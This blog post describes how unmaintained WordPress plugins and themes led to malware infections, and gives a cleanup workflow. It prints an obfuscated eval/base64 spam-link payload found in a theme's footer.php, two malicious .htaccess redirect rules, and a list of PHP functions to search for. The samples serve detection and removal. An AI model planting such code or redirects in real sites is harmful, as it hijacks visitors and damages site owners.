The Good, the Bad, and the Ugly of WordPress Plugins

The Ugly

Looking at my calendar, it is July 2018 and I have already received requests to clean out four WordPress websites that were infected with malware since January. The common cause for all four infections is the result of unmaintained plugins. Google had actually red flagged these websites warning visitors of potential malware, causing heartache to the owners.

My workflow to remove the discovered malware is presented further into this post.

The Good

Plugins are ways to extend and add to the functionality that already exists in WordPress.
The core of WordPress is designed to be lean and lightweight, to maximize flexibility and minimize code bloat. Plugins then offer custom functions and features so that each user can tailor their site to their specific needs. [WordPress Codex]

 

The WordPress Ecosystem makes it so easy for anyone, especially those with no technical skills to install awesome features into their WordPress website. A plugin is a code that a developer puts into a package (plugin), the user then “plugs” it into their website for added functionality.

Examples of some functionality features: Photogallery, video gallery, contact form, social media sharing, security, SEO optimization, and more. In fact, as of this post date, there are 55,510 plugins listed in the WordPress Plugin Repository. This number does not include the hundreds of 3rd party plugins that are also available outside of the WordPress Repository.

There are both Free and Premium plugins available for use. All the plugins listed in the WordPress Plugin Repository are free, but some have options to upgrade to a premium paid version that offer even more features.

Simple
Installing plugins is not hard to do.
Wordpress was designed for the non-techie, they make it easy for users to install plugins to their website without knowing a single line of code.

The Bad

Installation

Like any good thing, there is also a downside of these wonderful plugins.
Before installing any plugin from within the WordPress Repository, there are a few crucial checks you should perform. It can save you much difficulty down the road.

1) Check Last Updated date.

In this example, 11 years is a Big Red Flag, you could be open to vulnerabilities if you install this plugin. This ususally indicates that this plugin has been abandoned by the developer. Look for a plugin that has been updated within the current year, or at worst no longer than one year.

2) Check Support Forum Tab
Key things to look for (potential red flags):
1 See how many visitors viewed a question.
How frequently are people asking for support.
Is there any duplicate or repeated problems?

2 Are there any replies?
Did the developer respond with a fix or answer?
How long did take the developer to reply (see time and date in the last column)?
If there are a lot 0 replies, you need to question the support, the developer may not have time to answer.

Active Installations – This is not a stat of the amount of downloads, but how many websites have it actively installed. In other words how many websites find this plugin beneficial and is activated by the website owners.

Sometimes a low number of active installs may not mean the plugin is not popular or has problems for the following reasons:
1. It could be a new plugin that may have just been published.

2. A plugin that handles an unusual feature that is not commonly used (example: plugin that gives you a pink dashboard).


 

Tested Up To – You want to be sure the plugin is compatible with the most current WordPress core update. There is a correlation between this test and the plugin updates. If a particular plugin has not been updated in a year, it comes to reason that it was not tested in the lasted WordPress core update.

This could lead to compatibility problems, as either the plugin will not work with the latest core updates, or it will break the website. Either way, it is not a good thing.

So What Happened?

This a short overview of how these websites got infected with malware.

Website 1
This WordPress site was built about 8 years ago. At that time, all the plugins installed were current.
Somewhere along those 8 years, a developer abandoned support of a plugin.
The owner of the website never realized this, although he always updated his plugins, he never checked to see the status of each plugin.
Infected Plugin: Captcha – not updated in 3 yrs, red flagged “Critical” by Wordfence.

Website 2
The owner of this website wanted to perform his own maintenance.
He noticed that the website was receiving a high amount of 404 errors.
After reading an article about how 404 errors can affect his SEO, he wanted to fix this issue.
As one who enjoys getting his hands dirty, he found a plugin called: “404 to 301 Redirect, Log and Notify 404 Errors,” hoping that it would solve this issue.

Well, it turned into every website owners nightmare, Google placed a huge warning on his website, “The Website Ahead Contains Malware.”

From my understanding, the developer of this plugin has since updated this plugin, sanitizing it of all malware.
Unfortunately, the damage had already been done.

Infected Plugin: 404 to 301 – Redirect, Log and Notify 404 Errors – Wordfence had flagged this plugin as “Harmful” as it injected spam links in the content.

Website 3
The person who maintained the website for this small business had left, so a new user who never worked with WordPress took over the maintenance and content updates for this shop.
In looking for a plugin to handle a specific need, she unknowingly installed a plugin that contained PHP Object Injection Vulnerabilities.

Infected plugin: Appointments – This plugin was flagged by Wordfence as “Critical” Severity 9.8.
This plugin has recently been updated correcting the problem.

Website 4
This problem was a difficult problem, as Google flagged this website as “Social Engineering Contents Detected.” Normally Social Engineering Content is tied to ads, this website had neither ads or affiliate links.

A scan was performed resulting in negative results.
So the only option I had at this junction was to reinstall the entire website with an older backup, trusting that this copy was saved prior to the infection.

Submitted a review request to Google Search Console and three days later I received a response that the review was successful and the website is now cleared.

Troubleshooting 1

This is a troubleshooting workflow that I executed to find and remove malware on WordPress sites.
This process may be similar to yours, while others may have a totally different approach.
Most of what I learned was through trial and error, with many failures and disappointments along the way.

Hopefully, this guide will help you get started with the eventual goal of having any Google warnings removed. This includes phishing, spamming, redirects or social engineering contents.

Before we get started, here are the tools and resources required:

  • Have a backup of your website not stored on your server
  • Account with Google Search Console
  • Familiar with WordPress Core Files
  • Accustomed to using CPanel
  • Require FTP (File Transfer Protocol) or familiar with CPanel File Manager
  • Require a Text Editor (NOT wordprocessor)
  • Have an account with WordPress Support Forums

Troubleshooting 2

Backup
Before we start to troubleshoot and deleting/editing files, make sure a backup of your website is available.
If for some reason you don’t have a backup create one now!
There are many free plugins available to provide this service.

If you have several copies of your backups, check to see the date of the oldest copy you have.
Flag this copy for possible use later and if the backup is stored on your server, copy it to your computer, USB drive or in the cloud so you can access it at any time.

Purpose of having a backup
If you should accidentally delete the wrong folder or files, or edit these files incorrectly, you can restore the website.
Yes, the malware may still be in the backup copy, but at least you can reset your website to start over again.
 


WordPress Support Forums

One great advantage about WordPress, is it’s huge community support.
If you are having difficulty, submit your question in the forum and you will receive guidance and advice.
So it is to your advantage to sign up and become part of this huge community, it’s free!

Note
You do not need to sign up to search for an answer.
You do need to sign up to submit a question.

Support Forum

Troubleshooting 3

Google Search Console

If you currently have a gmail account, you have access to all the Google Tools and Resources such as gmail, youtube, drive, calendar, photos, and the Search Console.
How to add a website property to Google Console

So why is the Google Search Console important?
1) To receive Google Alerts for critical errors or issues found on your website.
2) In most cases, Google will even show you where the malware content is located.
3) To submit a Request for Review, you’re required to have your website added as a Property on your account.
 

This is a sample of an actual hacked site I worked on, where Google flagged the location of the unauthorized files for you.

Troubleshooting 4

Scanning Tools available
How these scanners can help you.
1) If you are new to the Google Search Console and recently added your website to the console:

  • You will have to wait until a Site Verification has been completed
  • Then data collection can begin on your website

In the meantime, you can start using these scanners to help you troubleshoot your website.

2) If you already have an account, you can verify what Google has found with these scanners. Sometimes Google could not list the “Deceptive Pages,” so a scanner may be able to provide clues in locating the malware.
 


 

Online Malware Scanners

Tools to assist you in finding deceptive malware content on your website.
ScannerDescription
Sucuri Site Check - Scan your site for malware, errors
and blacklisting status for free!
urlscan - urlscan.io allows you to scan a website and analyze the resources it requests and the domains it contacts. Understand what your website is doing.
VirusTotal - Analyze suspicious files and URLs to detect types of malware, automatically share them with the security community.
PhishTank - PhishTank is a collaborative clearing house for data and information about phishing on the Internet.
Norton SafeWeb - Norton Safe Web scans millions of websites to make sure they are safe. Visit Norton Safe Web now to see if a website you are interested is safe to visit.
Quttera - Need to Register: Free online heuristic URL scanning and malware detection. Scan websites for malware, exploits and other infections with quttera detection engine.
WebInspector - a free, cloud-based service that performs website security check, removes malware & helps you protect websites from hackers.

 


 

Plugins with a scanner
Wordfence
The free version can be found in the WordPress Plugin Repository.

Sample screenshot of a Wordfence scan that found vulnerabilities in an actual infected website.

All the files marked Critical in Red were found and deleted.
 

Another plugin that contains a scanner is:
Defender

Defender can be installed from the WordPress Plugin Repository and is Multi-site compatible.

Troubleshooting 5

Examine WP Core Files

If you are new to WordPress, you can skip this step.
Since you are not familiar with the WordPress Core Files, you won’t be able to distinguish illegal folders and files from the authorized ones. So it would be best to leave this step to someone familiar with WordPress or trust one of the scanners.

To perform an audit of the WordPress core files, you will need to use one of the tools below to view the files:

  1. FTP application such Filezilla or Cyberduck
  2. Cpanel: File Manager

This is a sample snapshot of clean WordPress Core Files: First Level


 

This is a sample snapshot of Malware found
I am sorry, I didn’t take a screenshot of the actual malware folders found in the WordPress Core while using Filezilla (FTP).
I had already moved them off the server to a separate folder on my USB Drive.


 

I was able to immediately recognize that these folders were not part of the normal WordPress core structure. They were deleted from the server, but I saved the files on a USB drive to analyze later.

Troubleshooting 6

WordPress Themes

Fundamentally, the WordPress Theme system is a way to “skin” your weblog. Yet, it is more than just a “skin.” Skinning your site implies that only the design is changed. WordPress Themes can provide much more control over the look and presentation of the material on your website. [WordPress Codex]

Questions you need to ask:

  • Have the themes been updated?
  • Have unused themes been deleted?
  • Are you using Free themes from outside the WordPress Theme Directory?

 

Theme Installation Precheck:

 
Before you install any theme, it is recommended you follow the identical process of installing plugins.

1 Check Last Updated date.
2 Check Active Installations.
3 Check Support, does developer answer in a timely manner?
 

Like plugins, you need to immediately update your themes, delete unused themes, especially free themes found outside of the WordPress Theme Directory.

Everybody loves free things, but sometimes a wrong theme may be providing the user more than they bargained for.
How about headaches, this beautiful looking theme could end up producing spam bots, redirect visits to another site, or place ads on your website without your permission.

On the other hand, Free themes from the WordPress Theme Directory are wonderful, they are pre-inspected and certified for safe use.

How to test a theme

First, install the theme on your site, but don’t activate it.
Next, install the Theme Authenticity Checker (TAC) from the WordPress Plugin Directory, it’s free.
Just follow the steps in the Theme’s page after this plugin is activated.

Side note: Some premium themes may display warnings when tested.
If you look at the warnings, it is not for malicious code.
The reason is that many of these themes were never intended to be added to the WordPress Theme Directory, so they were not written to pass the WordPress.org requirements or standards.

Here is a sample screenshot of a TAC scan result:


Image courtesy of BuiltBackwards

 

The theme that is red flagged needs to be deleted ASAP!

Checking Theme Files Manually

This process can be a bit tedious, and not for the faint in heart.
Something a developer might take the time to pursue and investigate.
1) If a theme is red flagged during a test, you may want to find out where the malicious code is located, and how it is injected into the files.
2) Manually open the theme files by unzipping the folder. Normally the malicious code can be found in the following files:

  • footer.php
  • header.php
  • functions.php

Actually, unwanted code could be in other files, but normally I have found them in these three files.
 

Sample
Here is a actual sample of malicious code found in the footer.php file inside of a free theme.
This theme was not from the WordPress Theme Directory.
footer.php file:

<!--?php eval(gzinflate(base64_decode
("ZZHPTsMwDMbPnbR3sHJYNmm00naDND0AJ26UCye
UtW5TkTZV4tFN4oV4DZ6M/hnatMkX258/+Sc7kSK
vviAzyvuYFdYSOibnsyAIboUPOhCTi8y2R
xAKtMMiZhGTIml1Cztjy6op7JI3qka+eoBEikhJWMMT
+qpsMIfdhVETtfdR1HVd6AmVIe2RqGpKH2a2ZkAVGYxZO
mmQnkQmrzvDkjX8/oBIzhAwUUCPgZm2wIGHuSJc8vc
JDb7hTWONkI9wl2j8As3sD3t3bJUz1g1c0edmu3XKk
/IYaqoNly94qgeQEMTO9Qecz84XSgrEPHbeb5h8bsh
VODLD8jVNV7CA68l+TY0N+bvJ8ngqzx4R9b8Zv/
SfDfEH"))); ?-->

 

I have seen enough php code, to recognize that this is not your normal footer php file.
This is a suspicious concealed code (obfuscated), and it was checked in Virustotal, which did verify it is malicious.
 


 

Results of the test:
 


 

So lets decrypt this code:
De-obfuscation this code using UnPHP.net
Results of the decoded script shown below:
 
 

<!--?php ?--><div class="footer">
<div class="footer_txt">© <a href="/"><!--?php 
bloginfo('name'); ?--></a>,
Designed by <a href="http://www.stealthsettings.com" title="Stealth Settings">Stealth Settings</a>,  
<!--? bloginfo( 'name' ); echo ' '.date('Y'); ?--> | 
Theme design by <a href="http://www.luxuryparlor.com/
k233rastase.html">Kerastase</a>. <br>
<a href="/?feed=rss2">Entries</a> (RSS) 
&amp; <a href="/?feed=comments-rss2">Comments</a> (RSS)</div>
</div>

 

As you can see, strange ads are now posted in your footer, linked to foreign websites.
If you noticed, a encoding scheme Base64 is used to “hide” the actual malicious code
within the obfuscation code.

I am not familiar with how this malicious code is initiated, one possible method is the

eval()

Function.
 

Read more about: Eval
 

Caution
“The eval() language construct is very dangerous because it allows execution of arbitrary PHP code. Its use thus is discouraged. If you have carefully verified that there is no other option than to use this construct, pay special attention not to pass any user provided data into it without properly validating it beforehand.” (PHP.net)
 

More resources on Base64 code.

Look at the obfuscated code image (scroll 4 images up) to see the:

 eval() 
base64_decode 

 

Replace With Fresh New Theme

If not sure or to be safe, replace your theme with a fresh copy of the latest version available.

Troubleshooting 7

.htaccess file

The .htaccess is a distributed configuration file, and is how Apache handles configuration changes on a per-directory basis.
WordPress uses this file to manipulate how Apache serves files from its root directory, and subdirectories thereof. Most notably, WP modifies this file to be able to handle pretty permalinks. [WordPress Codex]

Common Symptom of a Infected .htaccess File
Your website redirects all traffic to a strange site.

A basic and clean .htaccess file
This is how the .htaccess file should look after a fresh install of WordPress:

# BEGIN WordPress
<ifmodule mod_rewrite.c="">
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</ifmodule>
# END WordPress 

Important!
Always keep a backup of the .htaccess file stored away.
This file should be part of any backup package that you currently use.
 


Sample 1 Infected .htaccess File

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://XXXdarkweb.net/bad.php?t=3 [R,L]

This script checks if a visitor was sent by one of the above search engines, if so, they will be redirected to: XXXdarkweb.net.
 


Sample 2 Infected .htaccess File

<ifmodule mod_rewrite.c="">
        RewriteEngine On
        RewriteBase /
        RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
        RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC]
        RewriteRule ^.*$ http://blackmarketsales.tld [L,R]
</ifmodule>

This script redirects all traffic to blackmarketsales.tld.
 


As far as I know, there are four ways a .htaccess file can be edited:
1. Manually edit the file: download file with a FTP client or with File Manager in CPanel. Edit the file in your Text Editor and upload back to the server.

2. Certain plugins automatically add scripts as part of the plugins functionality:
examples, Caching plugins and Security plugins.

3. Plugins such as Yoast SEO allow editing through its dashboard.
SEO > Tools > File Editor

4. Hacked, unauthorized files injected through a backdoor file.

Where does a backdoor come from?
A malicious backdoor code is inserted through bad plugins or themes.
They are usually embedded within the PHP files, or even be a standalone file.

Discovering a hacked .htaccess File

  • Google’s Safe Browsing will detect flag your website
  • You notice your website is being redirected: also customers/people will inform you
  • If your online business suddenly has no traffic or sales
  • Use scanners listed above, they will mark suspicious files

Important!
You may already found and removed malicious folders and files discovered during a manual or scanner search.
But you are not done!
You need to check the .htaccess file to see if there are any unauthorized scripts left behind.
 


Two ways to fix the .htaccess file
1. Download and manually delete the malicious scripts.

2. Safer and easier method: replace the current .htaccess file with a clean backup copy.
Reason: Most WordPress .htaccess files have a lot of code added from various plugins. So unless you know how to read the scripts in the .htaccess file, it may be difficult for most people to really know if they are removing the correct files. If performed incorrectly, you can break your website.

So sometimes starting over with a fresh copy of your .htaccess file may be the safer choice.
 


 

Additional .htaccess Resources
WordPress.org

Sucuri

Wordfence

Troubleshooting 8

Database

The WordPress database is another popular source for hiding malicious files.
It is also the least managed portion of the WordPress platform, as the majority of WordPress owners
trust their hosting providers to upkeep and maintain their servers.

So when it comes to troubleshooting the database, most website owners balk at the thought of tinkering with the database.

Thank goodness, there are tools available to help you get your hands dirty with the WordPress database.

Important!
Before you get your hands on the database, be absolutely sure you have a full backup of your database.
If you have several older backups, that would be even more awesome.
 

Search

This is where hackers hide spam links, can add malicious iframes to posts/pages, and even smuggle CSS scripts:

h1.spam {
    display: none;
}

They will try and hide the link using CSS display: none property, so you cannot see the spam link, but Google will find it and place a warning on your website.

What to search for?
1. If you know the subject or topic that your website is spamming:
Try looking for: adult, viagra, shoes, budget, etc..
2. Malicious PHP functions:
Try looking for: eval, base64_decode, gzinflate, preg_replace, str_replace, shell_exc.
(I share more info about eval and base64_decode in Troubleshooting 6 above)
 

Tools

Here are three tools that can help you search, find and remove any unauthorized code within your database.

1. PhpMyAdmin located in your CPanel or Plesk dashboard.
2. ARI Adminer Plugin – WordPress Database Manager
3. Better Search Replace Plugin
 


PhpAdmin

Important!
Before you start, do have a backup or backups?

Step 1 You should be familiar with your CPanel, so after logging in, open the PhpAdmin icon.
If you not sure what you are doing, I suggest you leave this step to a professional, developer, or someone who has experience with the WordPress backend.

You need to know what database you are working on.
If not, “How to Find Your Database Name”
In the left side panel, select your database.
Double click to access the database.

Step 2 Search

  • Open the Search Tab
  • Fill in search criteria
  • Select All (tables)
  • Click GO

Step 3 Search Results

I suggest you click Browse to view the record.
You can now verify if this is the script you want to delete.
If you are really sure, you can delete the file now bypassing the Browse option.

Step 4 Browse Screen


 

  • You can Delete a single line item
  • Or Check All and Delete everything

Restore with a Backup

Another method to remove any malicious files from your database is to restore it with a clean backup copy. That’s why make it a habit to keep several backups as far a month or two ago.

If you restore your database with a recent copy, it may contain the malware.

Here is a link to a great tutorial on how to restore a backup with PhpAdmin.
How to Backup and or Restore your MySQL Database Using phpMyAdmin
 


Using Plugins

ARI Adminer

– WordPress Database Manager Plugin.

Watch this video:


Better Search Replace

– WordPress Plugin

When moving your WordPress site to a new domain or server, you will likely run into a need to run a search/replace on the database for everything to work correctly.

  • Serialization support for all tables
  • The ability to select specific tables
  • The ability to run a “dry run” to see how many fields will be updated
  • No server requirements aside from a running installation of WordPress
  • WordPress Multisite support

Screen Shots

Request Google Review

You successfully removed the malware from your website.
You tested your website and everything seems good to go.

But visitors will still see the Google warning attached to your website.
“The site ahead contains malware”
Your website may now be clean, but the red flag is still attached to the website.

The next and final step is to Request a Review through Google.
 

Prerequisites

  • Have an active account with Google Search Console (see Troubleshooting 3)
  • Have verified ownership of your site through Google Search Console
  • Subject website is clean of all malicious files

 


In your Google Search Console dashboard, open Messages and click on the Malicious Content message.
This page should appear, and if you are certain that your website is clean, Click Request A Review.
 

 

On this next page, Google wants to know what you did to clean your website.
In this example, I submitted a very short explanation.
Usually, I insert a much more detailed workflow and would suggest you do so also.
Sample
Hello,
The following process was used to clear this website of any malicious content:
1) Deleted 2 plugins that were not updated in 3 years, flagged critical after scan.
2) Deleted folders and files that were suggested by Google Search Console as being malicious.
3) Tested website with Sucuri Site Check, urlscan, and Virustotal, all results satisfactory.
This website is ready to be reviewed.
Thank you.
Your Name


 

Google mentions that a response may take up to 72 hours.
From my experience, I have had a reply anywhere from 1 day to 3 days.


 

This is what you eventually want to see.
It means that your website will be cleared of all warnings, and your site is now safe for visitors.

Note: You may have to repeat a similar process with other malware scanning sites such as Norton Safeweb, as they will also flag your website. Each has their own review process so you just need to follow their instructions to clear your website of any warnings.

Below: Google Video on the Review Process

Conclusion

“Hardware is easy to protect: lock it in a room, chain it to a desk, or buy a spare.
Information poses more of a problem. It can exist in more than one place; be transported halfway across the planet in seconds; and be stolen without your knowledge.”
[Bruce Schneier, Protect Your Macintosh, 1994]

There is a lot of information on this blog, and there is still much more which I did not cover or only mentioned a little at this time such as:

  • “Social Engineering Content” warnings
  • wp-config.php file
  • Server
  • Backdoors

There might be a Part 2 coming down the road in the future.

WordPress is basically a secure platform.
People are the problem, they allow their websites to be compromised because they fail to be cautious of what they install (plugins, themes), hold off on performing updates, allow excessive users with Full Admin privileges, use simple passwords because they are lazy, etc..

So what do you think, are there WordPress security tips or horror stories you want to share?
 



Gerald Watanabe
Islandwebtek



Divi WordPress Theme


Share This